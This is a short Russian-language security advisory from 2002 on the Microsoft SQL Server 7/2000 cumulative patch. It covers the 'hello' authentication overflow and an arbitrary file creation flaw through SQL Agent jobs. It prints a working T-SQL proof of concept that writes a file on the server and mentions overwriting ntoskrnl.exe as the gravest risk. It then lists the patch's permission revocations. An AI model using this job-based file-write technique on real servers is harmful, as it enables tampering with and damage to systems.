Security Lab

Подробности уязвимостей в Microsoft SQL Server 7/2000

Дата публикации:04.10.2002
Дата изменения:17.10.2006
Всего просмотров:1127
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Совокупная заплата для SQL Server 7-2000 выпущенная вчера устраняет 4 новых уязвимости. Уязвимость, известная как Dave Aitel's "hello" bug  (переполнение буфера в процессе идентификации), была устранена в этой заплате.

Также была устранена проблема создание произвольных файлов на системе SQL сервера. Пример:

USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFileCreate',
@enabled = 1,
@description = 'This will create a file called c:\sqlafc123.txt',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',
@step_name = 'SQLAFC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:\sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'ArbitraryFileCreate'
Microsoft заявляет, что команды "операционной системы" могут быть вставлены в файлы – т.е. созданные файлы могут быть помещены в папку автозагрузки. Но это не верно для SQL Server 2000. Текст создаваемого файла - UNICODE, т.е. после каждых двух байт следует NULL символ. NULL символ препятствует выполнению команд OS. Самый опасный риск этой уязвимости – перезапись файла ntoskrnl.exe. Неизвестно, сработает ли это на SQL 7.0.

Также патч изменил права доступа к следующим процедурам (скорее всего для решение проблемы Дейва Эйтэля):

revoke execute on sp_add_job from public
revoke execute on sp_add_jobstep from public
revoke execute on sp_add_jobserver from public
revoke execure on sp_start_job from public
Ссылки: Notes on the SQL Cumulative patch